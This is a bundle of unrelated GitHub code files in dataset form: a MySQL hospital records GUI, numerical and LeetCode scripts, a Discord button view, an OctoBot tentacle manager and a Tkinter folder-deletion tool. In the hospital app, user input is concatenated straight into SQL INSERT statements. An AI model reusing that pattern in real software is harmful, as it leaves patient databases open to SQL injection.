database=\"hope_hosp\")\r\n    myCursor2 = dbms2.cursor()\r\n    data4 = []\r\n    myCursor2.execute(\"SELECT * FROM hope_hosp.faculty;\")\r\n    for j in myCursor2:\r\n        data4.append(list(j))\r\n    window1['-table5-'].Update(values=data4)\r\n    sg.popup(\"Faculty Updated\")\r\n\r\n\r\n# clearing form functions\r\ndef clear_patients():\r\n    for key in values:\r\n        window1['FirstName'].update('')\r\n        window1['LastName'].update('')\r\n        window1['Phone'].update('')\r\n        window1['Gender'].update('')\r\n        window1['EmergencyContact'].update('')\r\n        window1['ConditionDetails'].update('')\r\n        window1['AdmissionDate'].update('')\r\n    return None\r\n\r\n\r\ndef clear_departments():\r\n    for key in values:\r\n        window1['DepatmentName'].update('')\r\n        window1['DepartmentHead'].update('')\r\n        window1['OfficeNumber'].update('')\r\n        window1['DepartmentPhone'].update('')\r\n    return None\r\n\r\n\r\ndef clear_doctors():\r\n    for key in values:\r\n        window1['FristName'].update('')\r\n        window1['LastName'].update('')\r\n        window1['DepartmentID'].update('')\r\n    return None\r\n\r\n\r\ndef clear_nurses():\r\n    for key in values:\r\n        window1['FristName'].update('')\r\n        window1['LastName'].update('')\r\n        window1['DepartmentID'].update('')\r\n    return None\r\n\r\n\r\ndef clear_faculty():\r\n    for key in values:\r\n        window1['FirstName'].update('')\r\n        window1['LastName'].update('')\r\n        window1['DepartmentID'].update('')\r\n    return None\r\n\r\n\r\n# Submitting functions\r\ndef submit_patient():\r\n    FirstName = values['FirstName']\r\n    if FirstName == '':\r\n        sg.popup_error('Missing FirstName')\r\n    LastName = values['LastName']\r\n    if LastName == '':\r\n        sg.popup_error('Missing LastName')\r\n    Phone = values['Phone']\r\n    if Phone == '':\r\n        sg.popup_error('Missing Phone')\r\n    Gender = values['Gender']\r\n    if Gender == '':\r\n        sg.popup_error('Missing Gender')\r\n    EmergencyContact = values['EmergencyContact']\r\n    if EmergencyContact == '':\r\n        sg.popup_error('Missing EmergencyContact')\r\n    ConditionDetails = values['ConditionDetails']\r\n    if ConditionDetails == '':\r\n        sg.popup_error('Missing Condition Details')\r\n    AdmissionDate = values['AdmissionDate']\r\n    if AdmissionDate == '':\r\n        sg.popup_error('Missing Admission Date')\r\n    else:\r\n        try:\r\n            command = \"INSERT INTO hope_hosp.patient(FirstName, LastName, Phone, Gender, EmergencyContact,\" \\\r\n                      \" ConditionDetails, AdmissionDate) VALUES (\" + \"'\" + values['FirstName'] + \"'\" + \", \" + \\\r\n                      \"'\" + values['LastName'] + \"'\" + \", \" + \"'\" \\\r\n                      + values['Phone'] + \"'\" + \", \" + \"'\" + 
values['Gender'] + \"'\" + \", \" + \"'\" + values[\r\n 'EmergencyContact'] \\\r\n + \"'\" + \", \" + \"'\" + values['ConditionDetails'] + \"'\" + \", \" + \"'\" + values[\r\n 'AdmissionDate'] + \"'\" + \");\"\r\n print(command)\r\n myCursor.execute(command)\r\n dbms.commit()\r\n choice = sg.popup_ok_cancel('Please confirm Entry')\r\n if choice == 'OK':\r\n clear_patients()\r\n sg.popup_quick('Patient Entered')\r\n else:\r\n sg.popup_ok('Edit Entry')\r\n except:\r\n sg.popup('Kindly Check your Entries; possible foreign key constraint')\r\n\r\n\r\ndef submit_department():\r\n DepatmentName = values['DepatmentName']\r\n if DepatmentName == '':\r\n sg.popup_error('Missing DepartmentName')\r\n DepartmentHead = values['DepartmentHead']\r\n if DepartmentHead == '':\r\n sg.popup_error('Missing DepartmentHead')\r\n OfficeNumber = values['OfficeNumber']\r\n if OfficeNumber == '':\r\n sg.popup_error('Missing OfficeNumber')\r\n DepartmentPhone = values['DepartmentPhone']\r\n if DepartmentPhone == '':\r\n sg.popup_error('Missing Department Phone')\r\n else:\r\n try:\r\n command = \"INSERT INTO hope_hosp.department(DepatmentName, DepartmentHead, OfficeNumber, DepartmentPhone) \" \\\r\n \"VALUES (\" + \"'\" + values['DepatmentName'] + \"'\" + \", \" + \\\r\n \"'\" + values['DepartmentHead'] + \"'\" + \", \" + \"'\" + values['OfficeNumber'] + \"'\" + \", \" + \"'\" + \\\r\n values['DepartmentPhone'] \\\r\n + \"'\" + \");\"\r\n print(command)\r\n myCursor.execute(command)\r\n dbms.commit()\r\n choice = sg.popup_ok_cancel('Please confirm Entry')\r\n if choice == 'OK':\r\n clear_departments()\r\n sg.popup_quick('Department Entered')\r\n else:\r\n sg.popup_ok('Edit Entry')\r\n except:\r\n sg.popup('Kindly Check your Entries; possible foreign key constraint')\r\n\r\n\r\ndef submit_doctor():\r\n FristName = values['FristName']\r\n if FristName == '':\r\n sg.popup_error('Missing FirstName')\r\n LastName = values['LastName']\r\n if LastName == '':\r\n sg.popup_error('Missing LastName')\r\n DepartmentID = values['DepartmentID']\r\n if DepartmentID == '':\r\n sg.popup_error('Missing DepartmentID')\r\n else:\r\n try:\r\n command = \"INSERT INTO hope_hosp.doctor(FristName, LastName, DepartmentID) \" \\\r\n \"VALUES (\" + \"'\" + values['FristName'] + \"'\" + \", \" + \\\r\n \"'\" + values['LastName'] + \"'\" + \", \" + \"'\" + values['DepartmentID'] \\\r\n + \"'\" + \");\"\r\n print(command)\r\n myCursor.execute(command)\r\n dbms.commit()\r\n choice = sg.popup_ok_cancel('Please confirm Entry')\r\n if choice == 'OK':\r\n clear_doctors()\r\n sg.popup_quick('Doctor Entered')\r\n else:\r\n sg.popup_ok('Edit Entry')\r\n except:\r\n sg.popup('Kindly Check your Entries; possible foreign key constraint')\r\n\r\n\r\ndef submit_nurse():\r\n FristName = values['FristName']\r\n if FristName == '':\r\n sg.popup_error('Missing FirstName')\r\n LastName = values['LastName']\r\n if LastName == '':\r\n sg.popup_error('Missing LastName')\r\n DepartmentID = values['DepartmentID']\r\n if DepartmentID == '':\r\n sg.popup_error('Missing DepartmentID')\r\n else:\r\n try:\r\n command = \"INSERT INTO hope_hosp.nurse(FristName, LastName, DepartmentID) \" \\\r\n \"VALUES (\" + \"'\" + values['FristName'] + \"'\" + \", \" + \\\r\n \"'\" + values['LastName'] + \"'\" + \", \" + \"'\" + values['DepartmentID'] \\\r\n + \"'\" + \");\"\r\n print(command)\r\n myCursor.execute(command)\r\n dbms.commit()\r\n choice = sg.popup_ok_cancel('Please confirm Entry')\r\n if choice == 'OK':\r\n clear_nurses()\r\n sg.popup_quick('Nurse Entered')\r\n else:\r\n 
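# note: the INSERT was already committed above, so cancelling here only skips clearing the form\r\n                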
sg.popup_ok('Edit Entry')\r\n except:\r\n sg.popup('Kindly Check your Entries; possible foreign key constraint')\r\n\r\n\r\ndef submit_faculty():\r\n FirstName = values['FirstName']\r\n if FirstName == '':\r\n sg.popup_error('Missing FirstName')\r\n LastName = values['LastName']\r\n if LastName == '':\r\n sg.popup_error('Missing LastName')\r\n DepartmentID = values['DepartmentID']\r\n if DepartmentID == '':\r\n sg.popup_error('Missing DepartmentID')\r\n else:\r\n try:\r\n command = \"INSERT INTO hope_hosp.faculty(FirstName, LastName, DepartmentID) \" \\\r\n \"VALUES (\" + \"'\" + values['FirstName'] + \"'\" + \", \" + \\\r\n \"'\" + values['LastName'] + \"'\" + \", \" + \"'\" + values['DepartmentID'] \\\r\n + \"'\" + \");\"\r\n print(command)\r\n myCursor.execute(command)\r\n dbms.commit()\r\n choice = sg.popup_ok_cancel('Please confirm Entry')\r\n if choice == 'OK':\r\n clear_faculty()\r\n sg.popup_quick('Faculty/Staff Entered')\r\n else:\r\n sg.popup_ok('Edit Entry')\r\n except:\r\n sg.popup('Kindly Check your Entries; possible foreign key constraint')\r\n\r\n\r\n# GUI layouts\r\npatientTable_layout = [\r\n [sg.T('PATIENTS:')],\r\n [sg.Table(headings=headersPatients, values=PatientsData, display_row_numbers=True, enable_events=True,\r\n justification='center', key='-table1-')],\r\n [sg.Button(\"Refresh Patients\", key='-refreshP-', expand_x=True)],\r\n [sg.Button(\"Exit\", expand_x=True)]\r\n]\r\ndepartmentTable_layout = [\r\n [sg.T('DEPARTMENTS:')],\r\n [sg.Table(headings=headersDepartment, values=DepartmentData, display_row_numbers=True, enable_events=True,\r\n justification='center', key='-table2-')],\r\n [sg.Button(\"Refresh Departments\", key='-refreshD-', expand_x=True)],\r\n [sg.Button(\"Exit\", key='-exit-', expand_x=True)]\r\n]\r\ndoctorsTable_layout = [\r\n [sg.T('DOCTORS:')],\r\n [sg.Table(headings=headersDoctor, values=DoctorsData, display_row_numbers=True, enable_events=True,\r\n justification='center', key='-table3-')],\r\n [sg.Button(\"Refresh Doctors\", key='-refreshDr-', expand_x=True)],\r\n [sg.Button(\"Exit\", key='-exit-', expand_x=True)]\r\n]\r\nnursesTable_layout = [\r\n [sg.T('NURSES:')],\r\n [sg.Table(headings=headersNurse, values=NursesData, display_row_numbers=True, enable_events=True,\r\n justification='center', key='-table4-')],\r\n [sg.Button(\"Refresh Nurses\", key='-refreshNur-', expand_x=True)],\r\n [sg.Button(\"Exit\", key='-exit-', expand_x=True)]\r\n]\r\nfacultiesTable_layout = [\r\n [sg.T('FACULTY&STAFF:')],\r\n [sg.Table(headings=headersFaculty, values=FacultyData, display_row_numbers=True, enable_events=True,\r\n justification='center', key='-table5-')],\r\n [sg.Button(\"Refresh Faculty\", key='-refreshF-', expand_x=True)],\r\n [sg.Button(\"Exit\", key='-exit-', expand_x=True)]\r\n]\r\n\r\nPatientForm_layout = [\r\n [sg.T('Patient File')],\r\n [sg.T('FirstName'), sg.Push(), sg.I(size=(30, 5), key='FirstName')],\r\n [sg.T('LastName'), sg.Push(), sg.I(size=(30, 5), key='LastName')],\r\n [sg.T('Phone'), sg.Push(), sg.I(size=(30, 5), key='Phone')],\r\n [sg.T('Gender'), sg.Push(), sg.Combo(size=(30, 5), values=['Male', 'Female', 'Trans-sexual', 'Other'],\r\n key='Gender')],\r\n [sg.T('EmergencyContact'), sg.Push(), sg.I(size=(30, 5), key='EmergencyContact')],\r\n [sg.T('Condition Details'), sg.Push(), sg.I(size=(50, 5), key='ConditionDetails')],\r\n [sg.T('AdmissionDate'), sg.Push(), sg.I(size=(30, 5), key='AdmissionDate')],\r\n [sg.Button('Submit', key='-submit-', expand_x=True), sg.Button('Clear', key='-clear-', expand_x=True),\r\n sg.Button('Exit', 
key='-exit-', expand_x=True)]\r\n]\r\nDepartmentForm_layout = [\r\n    [sg.T('Department File')],\r\n    [sg.T('DepatmentName'), sg.Push(), sg.I(size=(30, 5), key='DepatmentName')],\r\n    [sg.T('DepartmentHead'), sg.Push(), sg.I(size=(30, 5), key='DepartmentHead')],\r\n    [sg.T('OfficeNumber'), sg.Push(), sg.I(size=(30, 5), key='OfficeNumber')],\r\n    [sg.T('DepartmentPhone'), sg.Push(), sg.I(size=(30, 5), key='DepartmentPhone')],\r\n    [sg.Button('Submit', key='-submit-', expand_x=True), sg.Button('Clear', key='-clear-', expand_x=True),\r\n     sg.Button('Exit', key='-exit-', expand_x=True)]\r\n]\r\nDoctorsForm_layout = [\r\n    [sg.T('Doctors File:')],\r\n    [sg.T('FristName'), sg.Push(), sg.I(size=(30, 5), key='FristName')],\r\n    [sg.T('LastName'), sg.Push(), sg.I(size=(30, 5), key='LastName')],\r\n    [sg.T('DepartmentID'), sg.Push(), sg.I(size=(30, 5), key='DepartmentID')],\r\n    [sg.Button('Submit', key='-submit-', expand_x=True), sg.Button('Clear', key='-clear-', expand_x=True),\r\n     sg.Button('Exit', key='-exit-', expand_x=True)]\r\n]\r\nNursesForm_layout = [\r\n    [sg.T('Nurses File:')],\r\n    [sg.T('FristName'), sg.Push(), sg.I(size=(30, 5), key='FristName')],\r\n    [sg.T('LastName'), sg.Push(), sg.I(size=(30, 5), key='LastName')],\r\n    [sg.T('DepartmentID'), sg.Push(), sg.I(size=(30, 5), key='DepartmentID')],\r\n    [sg.Button('Submit', key='-submit-', expand_x=True), sg.Button('Clear', key='-clear-', expand_x=True),\r\n     sg.Button('Exit', key='-exit-', expand_x=True)]\r\n]\r\nFacultyForm_layout = [\r\n    [sg.T('Faculties File:')],\r\n    [sg.T('FirstName'), sg.Push(), sg.I(size=(30, 5), key='FirstName')],\r\n    [sg.T('LastName'), sg.Push(), sg.I(size=(30, 5), key='LastName')],\r\n    [sg.T('DepartmentID'), sg.Push(), sg.I(size=(30, 5), key='DepartmentID')],\r\n    [sg.Button('Submit', key='-submit-', expand_x=True), sg.Button('Clear', key='-clear-', expand_x=True),\r\n     sg.Button('Exit', key='-exit-', expand_x=True)]\r\n]\r\n\r\nmain_layout = [\r\n    [sg.Button('Display PATIENTS', key='-viewP-')],[sg.Button('Enter Patients', key='-enterP-')],\r\n    [sg.Button('Display DEPARTMENTS', key='-viewD-')], [sg.Button('Department Registration', key='-enterD-')],\r\n    [sg.Button('Display DOCTORS', key='-viewDr-')], [sg.Button('Doctor Registration', key='-enterDr-')],\r\n    [sg.Button('Display NURSES', key='-viewN-')], [sg.Button('Nurses Registration', key='-enterN-')],\r\n    [sg.Button('Display FACULTY', key='-viewF-')], [sg.Button('Enter Faculty', key='-enterF-')],\r\n    [sg.Button('Exit', key='-exit-')]\r\n]\r\n\r\n# -MAIN-\r\nwhile True:\r\n    window = sg.Window(\"HOPE HOSPITAL\", main_layout)\r\n    event, values = window.read()\r\n    if event in (sg.WIN_CLOSED, '-exit-'):\r\n        break\r\n    if event == '-viewP-':\r\n        window1 = sg.Window(\"\", patientTable_layout)\r\n        event, values = window1.read()\r\n        if event == 'Exit':\r\n            window1.close()\r\n        if event == '-refreshP-':\r\n            refresh_patients()\r\n    if event == '-enterP-':\r\n        window1 = sg.Window(\"Patient Record Form\", PatientForm_layout)\r\n        event, values = window1.read()\r\n        if event == '-submit-':\r\n            submit_patient()\r\n        if event == '-clear-':\r\n            clear_patients()\r\n        if event == '-exit-':\r\n            window1.close()\r\n    if event == '-viewD-':\r\n        window1 = sg.Window(\"Departments:\", departmentTable_layout)\r\n        event, values = window1.read()\r\n        if event == '-exit-':\r\n            window1.close()\r\n        if event == '-refreshD-':\r\n            refresh_departments()\r\n    if event == '-enterD-':\r\n        window1 = sg.Window(\"Department File:\", DepartmentForm_layout)\r\n        event, values = window1.read()\r\n        if event == '-submit-':\r\n            
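# 'values' is module-global, so submit_department() reads this window's fields from it\r\n            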
submit_department()\r\n        if event == '-clear-':\r\n            clear_departments()\r\n        if event == '-exit-':\r\n            window1.close()\r\n    if event == '-viewDr-':\r\n        window1 = sg.Window(\"Doctors:\", doctorsTable_layout)\r\n        event, values = window1.read()\r\n        if event == '-exit-':\r\n            window1.close()\r\n        if event == '-refreshDr-':\r\n            refresh_doctors()\r\n    if event == '-enterDr-':\r\n        window1 = sg.Window(\"Doctors File:\", DoctorsForm_layout)\r\n        event, values = window1.read()\r\n        if event == '-submit-':\r\n            submit_doctor()\r\n        if event == '-clear-':\r\n            clear_doctors()\r\n        if event == '-exit-':\r\n            window1.close()\r\n    if event == '-viewN-':\r\n        window1 = sg.Window(\"Nurses:\", nursesTable_layout)\r\n        event, values = window1.read()\r\n        if event == '-exit-':\r\n            window1.close()\r\n        if event == '-refreshNur-':\r\n            refresh_nurses()\r\n    if event == '-enterN-':\r\n        window1 = sg.Window(\"Nurses File:\", NursesForm_layout)\r\n        event, values = window1.read()\r\n        if event == '-submit-':\r\n            submit_nurse()\r\n        if event == '-clear-':\r\n            clear_nurses()\r\n        if event == '-exit-':\r\n            window1.close()\r\n    if event == '-viewF-':\r\n        window1 = sg.Window(\"Faculty&Staff:\", facultiesTable_layout)\r\n        event, values = window1.read()\r\n        if event == '-exit-':\r\n            window1.close()\r\n        if event == '-refreshF-':\r\n            refresh_faculty()\r\n    if event == '-enterF-':\r\n        window1 = sg.Window(\"Faculty&Staff:\", FacultyForm_layout)\r\n        event, values = window1.read()\r\n        if event == '-submit-':\r\n            submit_faculty()\r\n        if event == '-clear-':\r\n            clear_faculty()\r\n        if event == '-exit-':\r\n            window1.close()\r\n\r\nwindow.close()\r\n","repo_name":"chesiredk/Mysql-projects","sub_path":"HopeHosp.py","file_name":"HopeHosp.py","file_ext":"py","file_size_in_byte":20041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12966051149","text":"import numpy as np\nimport math\nfrom scipy.misc import derivative\n\na = int(input(\"enter a: \"))\nb = int(input(\"enter b: \"))\ne = float(input(\"enter e (precision): \"))\n\ndef f(x):\n    return 3*x**4-4*x**3+x**2-2*x-3 \n\n\nif (f(a)*derivative(f, a, n = 2)>0):\n    x0 = a\n    xi = b\nelse:\n    x0 = b\n    xi = a\nxi_1 = xi-(xi - x0) * f(xi)/(f(xi) - f(x0))\n\nwhile (abs(xi_1 - xi) > e):\n    xi = xi_1\n    xi_1 = xi-(xi - x0) * f(xi)/(f(xi) - f(x0))\n\nprint(\"x = {}\".format(xi_1))","repo_name":"romanenko1s/NumericalMethodsOfProgramming","sub_path":"лр2/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20579515011","text":"import csv\nimport pickle\n\nhp = {}\nwith open(\"HP.csv\", \"r\") as f:\n    reader = csv.reader(f)\n    for line in reader:\n        if line[0] == \"Class ID\":\n            continue\n        #if line[0] != line[1]:\n        hp[line[0]] = line[1]\n\ntest = {}\nwith open(\"pmc2hp.csv\", \"r\") as f:\n    reader = csv.reader(f)\n    for line in reader:\n        for i in line:\n            if i == line[0]:\n                test[i] = {}\n                continue\n            test[line[0]][i] = ''\n\nfor key in test.keys():\n    for key1 in test[key].keys():\n        test[key][key1] = hp[key1]\n        #if test[key][key1] in hp.keys():\n        #    test[key][key1] = hp[key1]\n\nfor key, value in test.items():\n    print(key, ' ', value)\n\nwith open('terms.pickle', 'wb') as handle:\n    pickle.dump(test, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open('terms.pickle', 'rb') as handle:\n    new = pickle.load(handle)\n\nprint(new == test)\n\nfile = open('terms.txt', 
'a')\nfile.write(str(test))\nfile.close()\n","repo_name":"hsbEdin/Dissertation","sub_path":"Dissertation/terms.py","file_name":"terms.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30444326054","text":"import discord\n\nclass ConfirmView(discord.ui.View):\n    def __init__(self, author: discord.Member, timeout: float | None = 10) -> None:\n        super().__init__(timeout=timeout)\n\n        self.is_confirm: bool = False\n        self.author: discord.Member = author\n        self.message: discord.Message = None\n\n    async def on_timeout(self) -> None:\n        for child in self.children:\n            child.disabled = True\n        \n        await self.message.edit(view=self)\n\n    async def interaction_check(self, interaction: discord.Interaction) -> bool:\n        return self.author == interaction.user\n    \n    @discord.ui.button(label=\"Confirm\", style=discord.ButtonStyle.green)\n    async def confirm(self, interaction: discord.Interaction, button: discord.ui.Button):\n        await interaction.response.defer()\n        self.is_confirm = True\n        await self.on_timeout()\n        self.stop()","repo_name":"ChocoMeow/IUFI","sub_path":"views/confirm.py","file_name":"confirm.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"73714336428","text":"#avoid cache\nimport sys \nsys.dont_write_bytecode = True\n\n\n#------------------------------------------------------------------------------------------------------------------------\n#import logger\nfrom Logs.GetTracebackLogs import *\nlogger.warning(\"Application Log Started\")\n\n\n\n\n#------------------------------------------------------------------------------------------------------------------------\n#import methods\nfrom MethFolder.methFile import *\n\ndef clickedYes():\n    try:\n        dir = txt1.get()\n        logger.info(\"Main info - Entered directory: % s\" % dir)\n\n        if is_admin():\n            try:\n                res=clearDir(dir)\n                txt1.delete(0, END)\n                #logger.info(\"Text box content has been reset\")\n\n                #update log listbox\n                try:\n                    fname=\".\\\\Logs\\\\tracebacklog.txt\"\n                    #READ LAST 10 LINES OF LOG FILE\n                    with open(\".\\\\Logs\\\\tracebacklog.txt\", 'r') as f:\n                        LinesCount = len(f.readlines())\n                    if LinesCount>10:\n                        #last 10 lines\n                        NumberOfLines=10\n                        lines = LastNlines(fname, NumberOfLines)\n                        #lb3.configure(text= lines)\n                        listbox.delete(0, END)\n                        for i in range (NumberOfLines-1, -1, -1): #counts 9 to 0 - reverse order, latest log first\n                            listbox.insert((NumberOfLines-1)-i, lines[i])\n                    #if logs are not 10 lines yet, do this instead\n                    else:\n                        #last lines\n                        NumberOfLines=LinesCount\n                        lines = LastNlines(fname, NumberOfLines)\n                        #lb3.configure(text= lines)\n                        listbox.delete(0, END)\n                        for i in range (NumberOfLines-1, -1, -1): #counts 9 to 0 - reverse order, latest log first\n                            listbox.insert((NumberOfLines-1)-i, lines[i])\n\n                    \n                except Exception as e:\n                    logger.error(str(e))\n                    logger.error(traceback.format_exc())\n                return res\n            except Exception as e:\n                logger.error(str(e))\n                logger.error(traceback.format_exc())\n        else:\n            # Re-run the program with admin rights\n            ctypes.windll.shell32.ShellExecuteW(None, \"runas\", sys.executable, \" \".join(sys.argv), None, 1)\n            logger.error(\"Main Error - Access denied, admin rights required\")\n    except Exception as e:\n        logger.error(str(e))\n        logger.error(traceback.format_exc())\n    \n\n\n\n\n\nfrom tkinter import messagebox\n\ndef deleteClick():\n    reply = messagebox.askyesno(\"Important Notice\", \"Are you sure you want to delete this?\", 
icon ='warning')\n if reply == True:\n if clickedYes() == True:\n messagebox.showinfo('Successful','Deleted', icon='info')\n else:\n messagebox.showinfo('Error','Something went wrong, please check the logs at mainwindow or at ./Logs/tracebacklog.txt', icon ='error')\n else:\n messagebox.showinfo('Reply to deletion', 'Operation Canceled!', icon ='info')\n\n\n\n\n\n\ndef askExitYesNo():\n reply = messagebox.askyesno('Exit Confirmation', 'Do you really want to quit this application?')\n if reply == True:\n messagebox.showinfo('Exiting..', 'Click on OK to quit application')\n MainWindow.destroy()\n else:\n messagebox.showinfo('', 'Thanks for Staying')\n\n\n\n\n\n\n\n\n#------------------------------------------------------------------------------------------------------------------------\n#User interface tkinter\n\nfrom tkinter import *\nimport tkinter as tk\n\n\n\n#MainWindow\nMainWindow = Tk()\nMainWindow.title(\"Windows Troubleshooting app\")\n# photo = PhotoImage(file = \"Windows.ico\")\n# MainWindow.iconphoto(False, photo)\n\nMainWindow.geometry('400x220')\n\n\n\n\n\n#info label 1\n#create\nlbl = Label(MainWindow, text=\"Enter the directory to be deleted:\", font=(\"Arial\", 10))\n#position\nlbl.grid(column=0, row=0)\nlb2 = Label(MainWindow, text=\"Logs show below:\", font=(\"Arial\", 10))\nlb2.grid(column=0, row=2)\n#log label\nlb3 = Label(MainWindow, text=\"Last 10 lines of logs will show in this list:\", font=(\"Arial\", 10), fg=\"red\")\n#position\nlb3.grid(column=0, row=3)\n\n\n\n\n\n#path input\ntxt1 = Entry(MainWindow,width=10)\ntxt1.grid(column=1, row=0)\n\n\n\n\n#delete button\nbtn1 = Button(MainWindow, text=\"Delete\", bg=\"blue\", fg=\"white\", padx=20, pady=5, command=deleteClick)\nbtn1.grid(column=2, row=0)\n#exit button\nbtn2 = Button(\n MainWindow,\n text='Exit',\n command=askExitYesNo,\n padx=20,\n pady=5, bg=\"blue\", fg=\"white\"\n)\nbtn2.grid(column=2, row=3)\n\n\n\n\n\n#list box\nlangs = ('Java', 'C#', 'C', 'C++', 'Python',\n 'Go', 'JavaScript', 'PHP', 'Swift')\n\nlangs_var = StringVar(value=langs)\n\nlistbox = Listbox(\n MainWindow,\n listvariable=langs_var,\n height=6,\n selectmode='extended')\n\nlistbox.grid(\n column=0,\n row=4,\n sticky='nwes'\n)\n\n\n\n\n\n# link a scrollbar to a list\nvscrollbar = Scrollbar(\n MainWindow,\n orient='vertical',\n command=listbox.yview\n)\n\nhscrollbar = Scrollbar(\n MainWindow,\n orient='horizontal',\n command=listbox.xview\n)\n\nlistbox['yscrollcommand'] = vscrollbar.set\nlistbox['xscrollcommand'] = hscrollbar.set\n\nvscrollbar.grid(\n column=1,\n row=4,\n sticky='ns')\n\nhscrollbar.grid(\n column=0,\n row=5,\n sticky='ew')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nMainWindow.mainloop()\n\n\n","repo_name":"AtypicalSysAdmin/WindowsPathDeletePy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30371349138","text":"my_str = \"G()(al)\"\r\n\r\n\r\n# goal_parser = {\"()\":'o',\"(al)\":'al'} \r\n# class Solution: \r\n# def interpreter(self,command):\r\n# return command.replace(\"()\",'o').replace(\"(al)\",'al')\r\n \r\n\r\n\r\n# goal_parser = {\"()\":'o',\"(al)\":'al',\"G\":\"G\"}\r\n# class Solution:\r\n \r\n# def interpreter(self,command):\r\n# temp = \"\"\r\n# res = \"\"\r\n# for i in range(len(command)):\r\n# temp += command[i]\r\n# if temp in goal_parser:\r\n# res += goal_parser[temp]\r\n# temp = \"\"\r\n# return res\r\n \r\n \r\n\r\n\r\n# solution = Solution()\r\n# 
print(solution.interpreter(my_str))\r\n\r\n\r\n\r\n##practice\r\n\r\ngoal_parser = {\"()\":'o',\"(al)\":'al',\"G\":\"G\"}\r\nclass Solution:\r\n    \r\n    def interpreter(self,command):\r\n        temp = \"\"\r\n        res = \"\"\r\n        for i in command:\r\n            temp += i\r\n            if temp in goal_parser:\r\n                res += goal_parser[temp]\r\n                temp = \"\"\r\n\r\n        return res\r\n    \r\n    \r\n\r\nmy_str = \"G()(al)\"\r\nsolution = Solution()\r\nprint(solution.interpreter(my_str))\r\n\r\n","repo_name":"pouya-alipour741/Courses","sub_path":"Python/LeetCode_problems/GoalParser.py","file_name":"GoalParser.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13797979377","text":"import os\nimport os.path as path\nimport shutil\n\nimport octobot_commons.logging as logging\n\nimport octobot_tentacles_manager.constants as constants\nimport octobot_tentacles_manager.managers as managers\nimport octobot_tentacles_manager.util as util\n\n\nclass TentacleManager:\n\n    def __init__(self, tentacle, bot_installation_path=constants.DEFAULT_BOT_PATH):\n        self.tentacle = tentacle\n        self.bot_installation_path = bot_installation_path\n        self.target_tentacle_path = None\n\n    async def install_tentacle(self, tentacle_path):\n        self.target_tentacle_path = path.join(tentacle_path, self.tentacle.tentacle_type.to_path())\n        tentacle_module_path = path.join(self.target_tentacle_path, self.tentacle.name)\n        await self._update_tentacle_folder(tentacle_module_path)\n        await managers.create_tentacle_init_file_if_necessary(tentacle_module_path, self.tentacle)\n\n    async def uninstall_tentacle(self):\n        shutil.rmtree(path.join(self.bot_installation_path, self.tentacle.tentacle_path, self.tentacle.name))\n\n    @staticmethod\n    def find_tentacles_missing_requirements(tentacle, to_install_version_by_modules, available_tentacles):\n        # check if requirement is in tentacles to be installed in this call\n        return {\n            requirement: version\n            for requirement, version in tentacle.extract_tentacle_requirements()\n            if not TentacleManager.is_requirement_satisfied(requirement, version, tentacle,\n                                                            to_install_version_by_modules, available_tentacles)\n        }\n\n    @staticmethod\n    def is_requirement_satisfied(requirement, version, tentacle, to_install_version_by_modules, available_tentacles):\n        satisfied = False\n        # check in to install tentacles\n        if requirement in to_install_version_by_modules:\n            satisfied = TentacleManager._ensure_version(tentacle.name,\n                                                        version,\n                                                        to_install_version_by_modules[requirement])\n        if not satisfied:\n            # check in available tentacles\n            for available_tentacle in available_tentacles:\n                if available_tentacle.name == requirement:\n                    return TentacleManager._ensure_version(tentacle.name,\n                                                           version,\n                                                           available_tentacle.version)\n        return satisfied\n\n    @staticmethod\n    def _ensure_version(name, version, available_version):\n        if version is None:\n            return True\n        elif version != available_version:\n            logging.get_logger(TentacleManager.__name__). \\\n                error(f\"Incompatible tentacle version requirement for \"\n                      f\"{name}: requires {version}, installed: \"\n                      f\"{available_version}. 
This tentacle might not work as expected\")\n return True\n return False\n\n async def _update_tentacle_folder(self, target_tentacle_path):\n reference_tentacle_path = path.join(self.tentacle.tentacle_path, self.tentacle.name)\n await util.find_or_create(target_tentacle_path)\n for tentacle_file_entry in os.scandir(reference_tentacle_path):\n await util.replace_with_remove_or_rename(tentacle_file_entry,\n path.join(target_tentacle_path, tentacle_file_entry.name))\n","repo_name":"Drakkar-Software/OctoBot-Tentacles-Manager","sub_path":"octobot_tentacles_manager/managers/tentacle_manager.py","file_name":"tentacle_manager.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"14939728267","text":"import numpyfy\nimport search\nimport numpy as np\nimport plotnine as plt\nimport pandas as pd\nfrom adjustText import adjust_text\n\ndpi = 300\nfileType = \".jpeg\"\nsyntheticDirectory = \"../Synthetic-Results/\"\nrealDirectory = \"../Real-World-Results/\"\n\ndef paretoFilterDict(data):\n nonDominated = dict()\n\n for algo, info in data.items():\n dist, time = info\n dominated = False\n for _ , info2 in data.items():\n dist2, time2 = info2\n # > / >= because having a higher \n # time or distance is worse\n if time >= time2 and dist >= dist2:\n if time > time2 or dist > dist2:\n dominated = True\n if not dominated:\n nonDominated[algo] = (dist, time)\n \n return nonDominated\n\ndef infoForAlg(data):\n totalAccuracy = 0\n totalTime = 0\n numPoints = 0\n\n for row in data:\n totalAccuracy += row[1]\n totalTime += row[2]\n numPoints += 1.0\n\n return (totalAccuracy / numPoints, totalTime / numPoints)\n\ndef paretoByAllData():\n s = search.Search(syntheticDirectory)\n averages = dict()\n\n for algo in numpyfy.algorithms:\n _, fileName = s.filter_by_algo(algo)\n data = np.genfromtxt(fileName, delimiter = \",\", skip_header = 1)\n averages[algo] = infoForAlg(data)\n return paretoFilterDict(averages)\n\ndef barChart(x, y, groupBy, df):\n plot = 